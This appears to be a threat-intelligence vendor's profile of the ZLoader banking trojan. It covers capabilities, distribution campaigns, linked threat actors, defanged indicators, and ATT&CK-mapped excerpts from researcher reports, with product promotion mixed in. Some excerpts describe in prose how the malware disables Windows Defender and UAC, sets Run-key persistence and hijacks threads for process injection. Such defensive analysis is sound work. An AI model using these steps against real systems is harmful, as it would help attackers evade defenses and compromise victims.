ZLoader
ZLoader is a banking trojan, also known as Terdot and sometimes referred to as Zbot, first discovered in 2016 and described as a fork/offshoot of the Zeus banking trojan. The malware remains under active development and has evolved beyond banking fraud into a broader loader and access-enablement role.
High-confidence capabilities described in the source material include web injection for theft of cookies, passwords, banking credentials, and other sensitive information; browser cookie theft; credential theft; and newer VNC-based remote access functionality. Multiple sources also describe ZLoader being used as a first-stage loader to enable second-stage malware and ransomware operations. Reported follow-on or associated activity includes delivery or enablement of Cobalt Strike, remote-access backdoors, and ransomware families including Ryuk and Egregor. The content also places ZLoader among malware families increasingly used as loaders for later-stage attacks rather than purely for banking fraud.
Observed infection and distribution methods in the provided content include phishing and malicious email campaigns, malvertising, Google Ads redirection to fake software sites, signed MSI installers, LOLBAS-style execution chains, and MSIX package abuse. One detailed campaign targeted customers of Australian and German financial institutions via a fake TeamViewer site, used a signed MSI, disabled Windows Defender and UAC, established persistence via regsvr32 and a Run key, and injected the final payload into msiexec.exe via thread hijacking. The content also notes targeting of Japanese users via malvertising in another campaign.
The malware is associated in the content with several threat actors and ecosystems. Proofpoint linked TA547 to DanaBot campaigns and noted that the same actor had previously delivered ZLoader. Proofpoint also reported TA544 experimentally targeted Spain with ZLoader. SentinelLabs described a ZLoader campaign tied to the "Tim" botnet. Other reporting in the content links ZLoader to broader cybercrime and ransomware-access ecosystems alongside Trickbot, Qbot, IcedID, Buer Loader, BazaLoader, and SystemBC.
Targeting mentioned in the content includes banking customers and financial institutions, with specific emphasis on Australian and German banks in one campaign and Japanese users in another. Additional references place ZLoader in broader financially motivated campaigns and initial-access activity that can affect multiple sectors.
Indicators and technical traits explicitly mentioned include use of DGA-generated C2 domains in at least one campaign; infrastructure fingerprints such as gate.php on ZLoader domains; more than 350 mapped C2 domains in the Tim botnet reporting; overlap with the googleaktualizacija ZLoader botnet; and example domains/IPs from the SentinelLabs campaign including team-viewer.site, websekir.com, pornofilmspremium.com, mjwougyhwlgewbajxbnn[.]com, 194.58.108[.]89, and 195.24.66[.]70. The content also notes that arithmetic substitution obfuscation techniques seen in other malware were also used by ZLoader, and that similar crypter/unpacking loops were observed in malware droppers such as Ursnif, ZLoader, and Hancitor.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
5 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Delivered malware included ZLoader (a.k.a. Terdot), Gootkit, Ursnif, Corebot, Panda Banker, Atmos, Mazar Bot, and Red Alert Android malware.
Spain (Defunct) Castilian ZLoader Medium Volume Technology, Manufacturing & Hospitality Campaigns began experimentally in August of 2017 and ended in September of 2017.
Since the Emotet takedown, Proofpoint observed consistent, ongoing activity from The Trick, Dridex, Qbot, IcedID, ZLoader, Ursnif, and many others in our data serving as first-stage malware payloads in attempts to enable further infections, including ransomware attacks.
Since the Emotet takedown, Proofpoint observed consistent, ongoing activity from The Trick, Dridex, Qbot, IcedID, ZLoader, Ursnif, and many others in our data serving as first-stage malware payloads in attempts to enable further infections, including ransomware attacks.
MSIX package abuse has been observed in various threat campaigns, including those from FIN7, Zloader (Storm-0569), and FakeBat (Storm-1113).
Techniques & procedures
28 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
2 techniques
Resource Development
Initial Access
2 techniques
Initial Access
Execution
4 techniques
Execution
This initiates the second stage of the infection chain, downloading the dropper updatescript.bat through the PowerShell cmdlet Invoke-WebRequest... At first, it disables all the Windows Defender modules through the PowerShell cmdlet Set-MpPreference. It then adds exclusions... with the cmdlet Add-MpPreference
It will drop the setup.bat file, triggering the initial infection chain by executing cmd.exe /c setup.bat... The dropper then executes the third stage with the command cmd /c updatescript.bat.
Persistence
2 techniques
Persistence
The nsudo.bat script also completely disables UAC by setting the following registry key to 0: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
It then adds a new registry key in HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run... This ensures that the attacker’s implant survives machine reboots... The script downloads the file autorun100.bat... and places it in the startup folder
Privilege Escalation
5 techniques
Privilege Escalation
It first creates a new process as a host for the unpacked DLL, and for this sample it uses a new instance of msiexec.exe. Then it allocates and writes 2 RWX memory regions inside the target process.
Then it starts the unpacking by leveraging a process injection technique known as Thread Hijacking... VirtualAllocEx() -> WriteProcessMemory() -> GetThreadContext() -> SetThreadContext() -> ResumeThread()
It then adds a new registry key in HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run... This ensures that the attacker’s implant survives machine reboots... The script downloads the file autorun100.bat... and places it in the startup folder
Stealth
6 techniques
Stealth
Apart from the common dynamic loading of Windows API functions and encrypted strings, Bazar Loader relies on arithmetic substitution via identities to obfuscate the code... There are many other samples that have additional reverse engineering counter measures such as junk code, but a quick comparison revealed no functional differences.
The user is tricked into downloading the fake software in a signed MSI format... these other samples suggest that the attackers had multiple campaigns ongoing beyond TeamViewer and which included fakes such as JavaPlug-in.mis, Zoom.mis, and discord.msi.
It first creates a new process as a host for the unpacked DLL, and for this sample it uses a new instance of msiexec.exe. Then it allocates and writes 2 RWX memory regions inside the target process.
Then it starts the unpacking by leveraging a process injection technique known as Thread Hijacking... VirtualAllocEx() -> WriteProcessMemory() -> GetThreadContext() -> SetThreadContext() -> ResumeThread()
Defense Impairment
2 techniques
Defense Impairment
Credential Access
1 technique
Credential Access
Command and Control
5 techniques
Command and Control
SentinelLabs identified the entire infrastructure of the ‘Tim’ botnet, composed of more than 350 recently-registered C2 domains... Some domains implement the gate.php component, which is a fingerprint of the ZLoader botnet.
“…Zloader variant linked to Black Basta ransomware, employing Domain Name System (DNS) tunneling for stealthy command and control…”
This analytic story addresses the increasing trend of adversaries leveraging MSIX installers to deliver malware... multiple threat actors have been observed abusing MSIX files to deliver various malware payloads.
Impact
2 techniques
Impact
Other
1 technique
Other
IOCs tracked for this family
256 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
Other indicator types observed in public reporting.
Recent activity
41 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Named as malware associated with MSIX package abuse.
Zloader is referenced as malware observed in recent malicious MSIX package campaigns using developer-signed packages rather than Microsoft Store-signed packages.
Updated ZLoader variant using DNS tunneling for stealthy C2 and featuring an interactive shell (per the content).
Zloader is mentioned as an alternative initial-access malware used in Ryuk-related campaigns that also involved SystemBC.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.